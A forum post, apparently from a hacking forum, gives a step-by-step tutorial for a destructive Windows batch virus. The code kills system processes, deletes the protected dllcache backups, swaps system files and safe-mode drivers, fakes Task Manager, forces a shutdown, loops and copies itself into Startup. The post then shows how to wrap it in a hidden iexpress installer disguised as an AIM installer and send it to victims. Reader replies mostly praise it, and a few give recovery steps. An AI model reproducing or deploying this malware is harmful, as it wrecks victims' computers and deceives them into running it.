Killer Batch Tutorial

It's a collected and a bit modified tut.

Now to begin we must first ask our selfs questions... How can i cause harm to a computer so the target will not be able to get back to windows and will not be able to boot from safe mode, not only that, but delete our tracks and make the changes to the system so confusing and irreversible that the only way to save it is simply to reformat...well i covered all those fields for you guys.

Now what a batch file is?

well to me a batch file is simply A computer file containing a series of related program commands that instruct a computer to perform a series of tasks

What kind of commands to i need to know?

the commands your going to need to know is simple DOS commands (correct me if im wrong please ^^) and CMD commands,to see all Batch commands go to run,and type in Command.com then type help.

OK! how do i get started?

ok you will first want to open up note pad (start>run>notepad) once there we want to start our batch file with the command:

Code:

@echo off

this commands simply states the start of our batch file and to "hide" our commands and hides the directory of the batch,let's say the batch is on the desktop,when you run it,it will show C:\document...\Desktop\batchname.
so now that we've got our starting command lets do some research =)

if we our selves delete system file in the system32 file at random...they will magically appear as if nothing happens...hmm thats strange..why does it keep re appearing? well turns out the windows is one sneaky bastard and keeps copys of its system32 and other value-able files in the ole magical hidden:
C:\WINDOWS\system32\dllcache\
yes... this is where the back-ups are stored...if we delete these then the ones in system32 will not re-appear and thus now we can manipulate these files any way we want as long as we delete the backups =) so now i will continue on with my code...

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe

I put tskill because winlogon/explorer/taskmgr may be running,so it's better to just disable them

as you have seen here, these are all vital processes for windows to start... and now that we've removed the original copies..we have gotten the upper hand now so whats next? the PREVENTION.

the way this batch file is going to work properly is if we can somehow disable the task manager..hmm ok we can just delete tasmgr.exe from system32 and it will never work..butt i love being sinister,evil, and most of all sexy so what i am going to do is make a new batch file with the following code:

Code:

@echo off
msg * oh yea baby press them buttons like you have never pressed them before lol hahaha

Having that done we want to convert it in to an .exe with the name taskmgr..so your output should be taskmgr.exe (google the converter) !GASP! now this is going to be our haha you know your ******* screwed punch line, for those of you who havent catched up..were basicly gonna replace the real taskmgr.exe with our fake one thus every time they press CTRL+ALT+DELETE they will get our lovely/scary/very sexy message.
Now back to our original batch file we now are going to set the command to copy
so our code will look like this (the copy command is simple..it just copies)

The dirty message ( the .exe ) has to be inside the same folder as this batch,or it will not work

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32

Now that we have the prevention from pressing control alt delete.. we now need to add the CONFUSION this technique is used to confuse the smart tech guys over at your nearest computer shop on what is going on.

We are going to rename all the system files into each other..so for example when winlogon.exe wants to load, explorer.exe loads instead and so on.

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe

This my friends will make the computer go nuts, now that we have that..i don't want my user to even try and use safe mode and turns out..GASP! safe mode needs to load two very special .sys files named mup.sys and vga.sys which im guessing its for video..anywho we are going to want to delete those from the cache and rename them, becareful though, they are not located in system32.

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys

(Note:Ren also works)

Ok now we must force the user to shutdown..but remember to give the system enough time to replace these files so lets add the shutdown command
which shutdown your computer (-t means time and -c means comment)

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10

Now the user has 10 seconds before complete system shutdown..now if you change those system files...we are going to get a pop up saying to locate your windows xp cd because valueble files have been replaced..haha heres a challange run this program on your computer and look for your windows xp copy/insert it/ and let it load in 15 seconds hahahaha good luck specially when your cought off guard =P.

Ok now we're still gonna add even more goodies to this batch..we are going to fork it..yes youve heard me..fork is when the application opens and application which opens the application while the others open applications..so basicly you stupify the computer with cmd pop ups sp no we use the echo command to bring out what we want the users to see.

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA

Ok now we have them what we want the to see... NOW we are going to make it repeat it by trying to open this very same file again by using label. a label is basicly a bookmark in your book, it lets you go back to that specific place. so a label looks like this-

Code:

:start

":" is label and "start" is the name (it can be anything).

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
DEL "C:\WINDOWS\system32\dllcache\winlogon.exe"
DEL "C:\WINDOWS\system32\dllcache\explorer.exe"
DEL "C:\WINDOWS\system32\dllcache\services.exe"
DEL "C:\WINDOWS\system32\dllcache\vga.sys"
DEL "C:\WINDOWS\system32\dllcache\mup.sys"
DEL "C:\WINDOWS\system32\dllcache\taskmgr.exe"
DEL "C:\WINDOWS\system32\taskmgr.exe"
copy "taskmgr.exe" "C:\WINDOWS\system32"
RENAME "C:\WINDOWS\system32\services.exe" "explorer1.exe
RENAME "C:\WINDOWS\system32\winlogon.exe" "services.exe"
RENAME "C:\WINDOWS\system32\explorer1.exe" "winlogon.exe"
RENAME "C:\WINDOWS\explorer.exe" "explorer1.exe"
RENAME "C:\WINDOWS\winhelp.exe" "explorer.exe"
RENAME "C:\WINDOWS\explorer1.exe" "winhelp.exe"
RENAME "C:\WINDOWS\system32\drivers\mup.sys" "mup2.sys
RENAME "C:\WINDOWS\system32\drivers\vga.sys" "mup.sys"
RENAME "C:\WINDOWS\system32\drivers\mup2.sys" "vga.sys"
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
:start

So finally

Code:

@echo off
tskill /a /im winlogon
tskill /a /im explorer
tskill /a /im taskmgr
del %systemdrive%\windows\System32\dllcache\winlogon.exe
del %systemdrive%\windows\System32\dllcache\explorer.exe
del %systemdrive%\windows\System32\dllcache\services.exe
del %systemdrive%\windows\System32\dllcache\vga.sys
del %systemdrive%\windows\System32\dllcache\mup.sys
del %systemdrive%\windows\System32\dllcache\taskmgr.exe
copy taskmgr.exe %systemdrive%\windows\system32
RENAME %systemdrive%\WINDOWS\system32\services.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\system32\winlogon.exe services.exe
RENAME %systemdrive%\WINDOWS\system32\explorer1.exe winlogon.exe
RENAME %systemdrive%\WINDOWS\explorer.exe explorer1.exe
RENAME %systemdrive%\WINDOWS\winhelp.exe explorer.exe
RENAME %systemdrive%\WINDOWS\explorer1.exe winhelp.exe
RENAME %systemdrive%\WINDOWS\system32\drivers\mup.sys mup2.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\vga.sys mup.sys
RENAME %systemdrive%\WINDOWS\system32\drivers\mup2.sys vga.sys
shutdown -s -t 10
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
Echo HAHAHAHAHAHAHAHAHAHAHAHAHAHAAHAHAHAHAHAHA
copy %0 "%systemdrive%\documents and settings\%username%\start menu\programs\startup"
:1
start %0
goto :1

Notice i put a directory there..hmm and its a start up too...wow i must be thinking something

now were gonna save this as virus.bat and make another simple batch file with the code-

Code:

@echo off
copy "virus.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
start virus.exe

And save it as move.bat
as you can see this will only start what we just made and move it to start ups =)) so if they fix the problem ( by sheer luck) and turn the comp back on with this file still in start up..they will be surprised =)).. now we are going to turn these files into .exe with the converter (bat to exe;google it). we are going to choose move.bat and click compile. and then do the same for virus.bat, after this you should end up with a move.exe and a virus.exe. now how in the world are we going to include the task manager we made into our file..hmmmm OH! windows has its own packalotofevilexe program =) go to start run then type iexpress
!GASP!!

Now create a new self extraction then click next
Select extract and install (the first choice Buzzo) then next
Give it a good looking tiltle like...Install_AIM then next
Then no promt then next
No license..next
Ah now we add our move.exe, virus.exe and taskmgr.exe in to this wonderful white box And click next
On the box that says install program select move.exe then next, we don't need anything for the bottom
Select hidden then next
No message, next
Now check hide process animation from user and click browse to save it and give it a good Name like above..something beleive able like Installer_AIM.exe
No restart, next
Don't save if you do then save i don't care, next
Then create and your Installer_AIM.exe will be created.. NOW! look at the fugly icon..
Use my icon changer and look for an AIM icon or something to make it beleive able, my icon changer is pretty self explanatory (and not..its really not mine) so i don't feel like getting into the icon changer since even a stupid one can do it. your .exe is now alive and kicking so send it to your nearest myspace user.

And u can code the hole -unauthorized word- thing here----

Code:

http://batchcrypt.110mb.com

hope this help and that site is very good hope you like it

 

Nice Batch Virus.. Keep up the good work.

 

thanks mate

 

Awesome tutorial!!! :auto: :bandana: :crowd: :gun: :gunsmilie :shoot: :cornut: :rockon:

 

lol how long did that take to make lol? all the smile faces its cool

 

omg that's crazy
very nice tutorial
keep it up :happy:

 

Thankyou mate

 

Very nice tutorial, but is there a way to prevent this from happening once the exe starts to run?

 

When you have the shutdown at 10 seconds. go fast to cmd type "shutdown -a"
that mean you abort the shutdown.

go "START" and "RUN" type "/sfc purgecache" and "/sfc scannow"
when you do the scannow command you have to put in your windows cd.
This will restore all windows files so are changed.

I have't tested this out on the virus but i think it will work..
or you may use "System Restore".

Also you must delete the file in "Startup folder" so the virus wont boot when you reboot the
computer.

 

Only 10 seconds to open up command prompt and write shutdown -a ouch, it would totally suck if you misspell it.

 

since explorer.exe is taken away you need to press "WINDOWS + R" that take you to "RUN"
you can also type it in run "shutdown -a"

 

Thank you GreenGrass. It helps to know this prevention for future reference.

 

Also if you are going to use system Restore go to cmd
type "%systemRoot%\system32\restore\rstrui.exe"
sorry that i did't typed that in the last post :/

 

Thank you again .

 

LOL yeah that would lol i laughed for like 5 minutes when i read that lol thanks mate

 

This is a great batch program!! Some people really underestimate the power of batch files. Great job!!!

 

lol thanks mate

 

Great, but what's up with your website? I mean really...

 

Well to sumarize it mate


Dont ever trust anyone if u ever make a site like a forum dont make staff

one of my staff i loved so much decided to betray me

thtas all im gonna say

 

Oh i see =\